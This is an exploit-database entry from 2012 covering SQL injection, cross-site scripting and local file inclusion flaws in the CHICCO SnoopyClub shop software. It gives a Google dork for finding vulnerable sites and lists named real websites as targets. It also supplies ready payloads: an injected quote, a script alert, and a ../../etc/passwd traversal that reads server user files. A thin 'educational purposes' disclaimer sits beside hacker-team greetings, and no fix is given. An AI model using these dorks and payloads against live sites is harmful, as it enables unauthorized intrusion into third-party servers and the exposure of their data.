Lucene search
K

CHICCO SnoopyClub - SQL Injection / XSS / LFI Vulnerabilties

🗓️ 19 May 2012 00:00:00Reported by the_cyber_nuxbieType 
zdt
 zdt
🔗 0day.today👁 18 Views

CHICCO SnoopyClub - SQL Injection / XSS / LFI Vulnerabilities - Discovered by TheCyberNuxbie, affecting webapps and private area. Includes SQLi and XSS vulnerabilities. Use at your own risk for educational purposes

Code
 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0      _                   __           __       __                      1
 1    /' \            __  /'__`\        /\ \__  /'__`\                    0
 0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
 1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
 0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
 1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
 0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
 1                   \ \____/ >> Exploit database separated by exploit    0
 0                    \/___/          type (local, remote, DoS, etc.)     1
 1                                                                        1
 0   [x] Official Website: http://www.1337day.com                         0
 1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
 0                                                                        0
 1                $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$              1
 0                I'm NuxbieCyber Member From Inj3ct0r TEAM               1
 1                $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$              0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1

 ==========================================================================
 <<<:>>>         CHICCO SnoopyClub - SQLi/XSS Vulnerability          <<:>>>
 ==========================================================================

 - Discovered By:
 ||| TheCyberNuxbie - Independent Security Research |||
 <<:- [email protected] -:>> $ YM: nux_exploit
 [ www.31337sec.com ] x CP: +62856-2538-963

 - Use it at your risk,,,
 This was written for educational purpos,,,
 Author will be not responsible for any damage. //nuxbie

 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 ./Title Exploit : CHICCO SnoopyClub - SQLi/XSS Vulnerability
 ./URL Vendor Web: ShopKid CHICCO SnoopyClub - www.chicco-russia.ru
 ./Google Dork   : inurl:"/index.php?main=r_cat_ldr.php"
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 [xXx] SQL injection is a code injection technique that exploits a security
 vulnerability occurring in the database layer of an #application.
 The vulnerability is present when user input is either incorrectly
 filtered for string literal escape characters embedded in SQL #statements
 or user input is not strongly typed and thereby unexpectedly executed.

 - Affected items (SQLi):
 http://127.0.0.1/webapps/index.php?main=tovar_ldr.php&id=xxx&id_cat_r=[SQLi]

 - Sample WebApps Vuln (SQLi):
 http://chicco-russia.ru/index.php?main=tovar_ldr.php&id=3551&id_cat_r=29' + [SQL Injection]
 http://w.zima-zima.ru/index.php?main=tovar_ldr.php&id_cat_r=72' + [SQL Injection]
 http://toys-land.ru/index.php?main=tovar_ldr.php&id_cat_r=93' + [SQL Injection]

 - Private Area:
 http://127.0.0.1/webapps/login.php <--- Private Area...!!!

 [xXx] Cross-site scripting (XSS) is a type of computer security vulnerability
 typically found in web applications which allow code #injection by malicious
 web users into the web pages viewed by other users.

 - Affected items (XSSed):
 http://127.0.0.1/webapps/index.php?main=[XSS]

 - Sample WebApps Vuln (XSSed):
 http://chicco-russia.ru/index.php?main=<script>alert(31337);</script> + [XSS]
 http://svetnaelku.ru/index.php?main=<script>alert(31337);</script> + [XSS]
 http://big-elka.ru/index.php?main=<script>alert(31337);</script> + [XSS]
 http://snoopy-club.ru/index.php?main=<script>alert(31337);</script> + [XSS]
 http://toys-land.ru/index.php?main=<script>alert(31337);</script> + [XSS]

 - Special Thanks:
 ...:::' 1337day - Inj3ct0r TEAM ':::...
 All Staff & 31337 Member Inj3ct0r TEAM,,,
 , And All Inj3ct0r Fans & All Hacktivist,,,

 #############################################################################
 - Me @ Solo Raya, Central Java, Indonesian. 20 May 2012 @ 03:17 AM.
  [ Inj3ct0r | PacketStromSecurity | Devilzc0de | Exploit-ID | ID-BackTrack ]
 #############################################################################



=============================UPDATE 20-05-2012=============================



++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Exploit Title    : CHICCO SnoopyClub Local File Inclusion 
# Dork In Google   : inurl:"/index.php?main=r_cat_ldr.php"
# Date             : 20-05-2012  
# Author           : Mr NoRvI  
# Email            : [email protected]  
# Vendor Web: ShopKid CHICCO SnoopyClub - www.chicco-russia.ru
# Severity : High
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- Use it at your risk,,,
 This was written for educational purpos,,,
 Author will be not responsible for any damage.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#Go To google : Type The dork 

#Choose any Website :

#For example : http://www.site.com

#Add : index.php?main=../../../../../../../../etc/passwd

# To Be like this :http://www.site.com/index.php?main=../../../../../../../../etc/passwd

#You'll find All The user's of the Server 

#Some Demo Sites : 

http://www.svetnaelku.ru/index.php?main=../../../../../../../../etc/passwd
http://toys-land.ru/index.php?main=../../../../../../../../etc/passwd
http://www.svetnaelku.ru/index.php?main=../../../../../../../../etc/passwd
http://www.big-elka.ru/index.php?main=../../../../../../../../etc/passwd


And More in google :p

#Greetz to: Arhack Forum & 1337day.com

./Done 



#  0day.today [2017-12-31]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation